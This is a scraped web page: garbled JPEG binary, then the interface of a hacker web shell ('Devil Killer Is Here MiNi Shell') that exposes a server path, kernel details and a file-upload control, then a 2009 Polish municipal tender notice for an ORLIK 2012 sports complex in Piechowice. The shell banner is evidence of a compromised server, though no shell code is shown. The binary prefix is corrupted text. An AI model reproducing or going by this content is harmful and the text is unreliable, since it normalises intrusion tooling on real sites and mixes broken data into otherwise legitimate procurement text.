JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/57487-N-2009.html

<p class="kh_header"><b>Piechowice: Budowa kompleksu sportowego Moje Boisko ORLIK 2012 w Piechowicach</b><br>
<b>Numer ogłoszenia: 57487 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piechowice , ul. Żymierskiego 49, 58-573 Piechowice, woj. dolnośląskie, tel. 075 7548900, faks 075 7612274.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://piechowice.bip.pbox.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego Moje Boisko ORLIK 2012 w Piechowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zadanie pn. Budowa kompleksu sportowego Moje boisko-Orlik 2012 w Piechowicach.
Lokalizacja: Piechowice, ul.Szkolna 6 (teren Szkoły Podstawowej nr 1)

Przedmiot zamówienia został określony kodem wg. Wspólnego Słownika Zamówień
CPV 45 21 22 21-1   -   Roboty budowlane w zakresie budowy boisk sportowych
	CPV 45.11.12.00-0  - Roboty w zakresie przygotowania terenu pod budowę 
                                     i roboty ziemne
     CPV 45.23.24.51-8    -  Roboty odwadniające i nawierzchniowe
     CPV 45.31.00.00-3    -  Roboty instalacyjne elektryczne
     CPV 45.33.22.00-5    -  Roboty instalacyjne wodne i kanalizacji
     CPV 45.26.22.10-6    -   Fundamentowanie,
     CPV 45.21.00.00-2- Roboty budowlane związane z obiektami na terenach 
                                sportowych, 


2.	Przedmiot zamówienia obejmuje:
2.1. Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 ( pole gry 26,0 x 56,0 m)
- podbudowa przepuszczalna 
- nawierzchnia do piłki nożnej - sztuczna trawa


Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport) 
1.	Typ włókna: monofil
2.	 Skład chemiczny włókna; polietylen
3.	Ciężar włókna: min. 11.000 Dtex,
4.	Gęstość trawy: min. 97.000 włókien /m2        
	Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej i Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych zwanych dalej STWiORB ( załącznik nr 7 do SIWZ pkt 1,2, 4).

W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego winien dołączyć do oferty: Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty:

A.	Dokumenty dotyczące nawierzchni z trawy syntetycznej:

a)	Raport z badań przeprowadzonych przez laboratorium (Laborsport lub ISA-
Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com),
b)	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub 
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniku badań 
specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Laborsport, ISA-Sport, Sports Labs Ltd lub dokument równoważny,
c)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
d)	Atest PZH dla oferowanej nawierzchni,
e)	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na 
realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez 
producenta na nawierzchnię.

- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od 
               płyty boiska 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej.
                  Roboty należy wykonać zgodnie z dokumentacją projektową i STWiORB   (załącznik nr 7 do SIWZ pkt 1,2, 4).

 Wyposażenie:
- bramki aluminiowe mocowane w tulejach				- 2 sztuki
- siatki do bramek                                        				- 2 sztuki
- chorągiewki - 4 różne i 2 środkowe, kompletne 		- 4 sztuki + 2 sztuki 
- piłkochwyty wzdłuż fragmentach krótszych boków boiska 		- 2 x 20 mb
	    Cały sprzęt sportowy winien posiadać, wymagane prawem dopuszczenia do użytkowania, że szczególnym uwzględnieniem bezpieczeństwa użytkowników.

2.2.	Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m)
Podbudowa:

	Podbudowa  nieprzepuszczalna z drenażem liniowym 
                
	Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).

Roboty należy wykonać zgodnie z dokumentacją projektową i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
    		
Nawierzchnia boiska wielofunkcyjnego
nawierzchnia poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
Technologie układania nawierzchni:

Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana) Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.

W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego winien dołączyć do oferty: Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty:


B.	Dokumenty dotyczące nawierzchni poliuretanowej:
a)	certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008 lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni sportowe np. Laborsport, lub dokument równoważny,
b)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
c)	Atest PZH dla oferowanej nawierzchni,
d)	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na nawierzchnię,


Wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy		  		- 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm			- 2 sztuki
- mechanizm regulacji wysokości 						- 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 	- 2 sztuki

Wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne z regulacją wysokości 
       mocowania siatki i mechanizmem naciągowym (badminton, tenis, siatkówka)										                      - 2 sztuki
- siatka do siatkówki 								- 2 sztuki

2.3. Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
2.4. Oświetlenie terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 9 m. Szczegółowe rozwiązania wg dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
2.5. Chodniki, droga dojazdowa, parking
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka polbrukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
2.6. Fundamenty pod budynek zaplecza socjalnego zwanego też zespołem szatniowo-sanitarnym
Fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
     2.7. Dostawa i montaż oraz wyposażenie zespołu szatniowo-sanitarnego (zwanego też zapleczem socjalnym) w systemie modułowym . 
      Zespół szatniowo-sanitarny musi spełniać wszystkie warunki i wymagania określone w Rozdziale 2 pkt 3   Specyfikacji Istotnych Warunków Zamówienia opracowanej przez Ministerstwo Sportu, a w szczególności zawarte w dokumentacji projektowej pn. Projekt architektoniczno-budowlany ZAMIENNY Modułowego Systemowego Zaplecza Boisk Sportowych ORLIK 2012 oraz odpowiadających im Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych.
Roboty związane z dostawą, montażem i wyposażeniem zaplecza socjalnego należy wykonać zgodnie z dokumentacją projektową i STWiORB (załącznik nr 7 do SIWZ pkt 3,5).

Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) wynosi 60 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

2.8. Roboty towarzyszące  towarzyszące:
-	odwodnienie terenu,
-	przyłącze wodno-kanalizacyjne, energetyczne.
należy wykonać zgodnie z dokumentacją projektową i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).


3.	Bieżnia sportowa czterotorowa o długości 60,0 m ( długość całkowita 75,30 m)  
Nawierzchnia bieżni  poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej i STWiORB jak dla boiska wielofunkcyjnego (załącznik nr 7 do SIWZ pkt 1,2, 4).
 
Technologie układania nawierzchni:
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana) Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.

Podbudowa po nawierzchnię bieżni wg. dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).

4.	Skocznia do skoku w dal.
Rozbieżnia skoczni do skoku w dal:
Nawierzchnia rozbieżni  do skoku w dal poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej i STWiORB jak dla boiska wielofunkcyjnego (załącznik nr 7 do SIWZ pkt 1,2, 4).


Technologie układania nawierzchni:
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana) Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.

Podbudowa po nawierzchnię rozbieżni do skoku w dal  wg. dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).


Zeskocznia do skoku w dal wg. dokumentacji projektowej i STWiORB (załącznik nr 7 do SIWZ pkt 1,2, 4).


5.	Szczegółowy opis przedmiotu zamówienia stanowią załączniki wymienione w Rozdziale 24 do SIWZ (w załączniku nr 7 do SIWZ).

1)	Projekt budowlany zespołu boisk - opracowany przez EKO-RAJ 
 Sp. z o.o.  z Wrocławia,
2)	 Projekt zagospodarowania terenu - opracowany przez EKO-RAJ
 Sp. z o.o. z Wrocławia,
3)	Projekt architektoniczno-budowlany ZAMIENNY Boisk Sportowych ORLIK 2012 opracowany na zlecenie Ministerstwa Sportu z wyłączeniem zapisów dotyczących ogrodzenia, fundamentów pod zaplecze socjalne
 i planu zagospodarowania terenu,
4)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - opracowany przez EKO-RAJ Sp. z o.o.  z Wrocławia,
5)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych dot. Projektu architektoniczno-budowlanego ZAMIENNEGO boisk sportowych ORLIK 2012 opracowane na zlecenie Ministerstwa Sportu z wyłączeniem specyfikacji 03ST nr 2D, 04ST nr 3E, 05 nr 4ZT.


6.	Wymagany okres gwarancji:
a)	na wykonane roboty ( materiały i robociznę) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego,

b)	na nawierzchnie syntetyczne - 60 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

c)	na budynek zaplecza socjalnego - 60 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.


7.	W szczególności Wykonawca w ramach ceny oferty:
-	zapewni obsługę geodezyjną w zakresie niezbędnym do prawidłowego wykonania 
robót oraz ich odbioru w formie operatu kolaudacyjnego, pomiarów powykonawczych w zakresie uzgodnionym z Inspektorem nadzoru inwestorskiego (dokumentacja powykonawcza w 2 egz), 
-	zorganizuje i utrzyma plac budowy w czasie prowadzenia robót.

6.  Termin wykonania zamówienia:
Zamówienie należy zrealizować w terminie: 130 dni licząc od daty protokolarnego przekazania placu budowy.

7. Integralną częścią opisu przedmiotu zamówienia są obowiązki Wykonawcy wynikające z projektu umowy - załącznik nr 6 do SIWZ

8. UWAGA: 
W przypadku użycia w Opisu Przedmiotu Zamówienia znaków, nazw towarowych czy pochodzenia ma zastosowanie, zgodnie z art. 29 ust. 3 ustawy PZP zapis lub produkt równoważny.    Zgodnie z art. 30 ust. 5 ustawy PZP Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi i roboty budowlane spełniają wymagania określone przez Zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.23.24.51-8, 45.31.00.00-3, 45.33.22.00-5, 45.26.22.10-6, 45.21.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 130.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 15.000,00 zł (słownie złotych: piętnaście tysięcy  złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:

Bank Gospodarki Żywnościowej S.A.       Oddział w Jeleniej Górze   
               Nr 10 2030 0045 1110 0000 0082 2000
5.	  W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał takiego dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w  pok. 11 (Referat Finansowy I piętro lub dołączyć do oferty).
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 

1.1.	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.	posiadają niezbędną wiedzę i doświadczenie zawodowe oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia tj.:


1)	udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45.21.22.21-1) tzn.  co  najmniej dwie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia a w tym:
a)	przynajmniej jedno boisko do piłki nożnej lub innych gier otwartych z nawierzchnią z trawy syntetycznej o wartości minimum 300.000,00 zł brutto
b)	przynajmniej jedno boisko do gier zespołowych o nawierzchni syntetycznej - poliuretanowej o wartości minimum 200.000,00 zł brutto,
  z podaniem ich wartości, dat wykonywania oraz odbiorców) oraz załączeniem dokumentów (np. referencje, protokoły odbioru itp.) potwierdzających, że te roboty zostały wykonane należycie;
2)	dysponują lub będą dysponowali osobami, legitymującymi się doświadczeniem zawodowym i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone lub posiadają pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. Wykonawca wraz z ofertą jest zobowiązany do przedstawienia wykazu osób pełniących poniżej wymienione funkcje, i które będą spełniać następujące warunki:

a) osoba proponowana do pełnienia funkcji Kierownika Budowy
-	minimalna liczba osób: 	jedna (1),
-	minimalne kwalifikacje:	posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
Wymieniona osoba do pełnienia funkcji Kierownika Budowy musi:
-	posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z dnia 07.07.1994 r.  Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów;
-	posiadać dokument potwierdzający przynależność do właściwej Izby Samorządu Zawodowego, z datą ważności na dzień otwarcia ofert;
b) osoba proponowana do pełnienia funkcji Kierownika Robót Sanitarnych
-	minimalna liczba osób: 	jedna (1),
-	minimalne kwalifikacje:	posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności instalacyjnej bez ograniczeń - w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
Wymieniona osoba do pełnienia funkcji Kierownika Robót Sanitarnych musi:
-	posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z dnia 07.07.1994 r.  Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów;
-	posiadać dokument potwierdzający przynależność do właściwej Izby Samorządu Zawodowego, z datą ważności na dzień otwarcia ofert;
c) osoba proponowana do pełnienia funkcji Kierownika Robót Elektrycznych
-	minimalna liczba osób: 	jedna (1),
-	minimalne kwalifikacje:	posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności instalacyjnej bez ograniczeń - w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
Wymieniona osoba do pełnienia funkcji Kierownika Robót Sanitarnych musi:
-	posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z dnia 07.07.1994 r.  Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów;
-	posiadać dokument potwierdzający przynależność do właściwej Izby Samorządu Zawodowego, z datą ważności na dzień otwarcia ofert;
1.3.  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
           zamówienia,  tj.: są ubezpieczeni od odpowiedzialności cywilnej w zakresie 
           prowadzonej działalności gospodarczej na kwotę minimum 500.000,00 zł,

1.4.	oświadczą, że spełniają warunki określone w art. 22 ust. 1 ustawy PZP,

a także

1.5.	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2, 3,
ust. 2 pkt. 1, 5, 5a, 6, ust. 3 pkt 3     Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane(Dz.U. Nr 87/2006, poz. 605 z póź. zm.) 
1.6.	złożą oświadczenie, że spełniają warunki określone w art. 22 ust. 1 PZP oraz, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP,
2. Sprawdzenie spełnienia w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WARUNKI PODMIOTOWE

Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa (poprzez załączenie do oferty) oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do  SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

 
1) Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane odpowiadające swoim zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (budowa obiektów sportowych) tj.:
a) przynajmniej jedno boisko do piłki nożnej lub innych gier otwartych z 
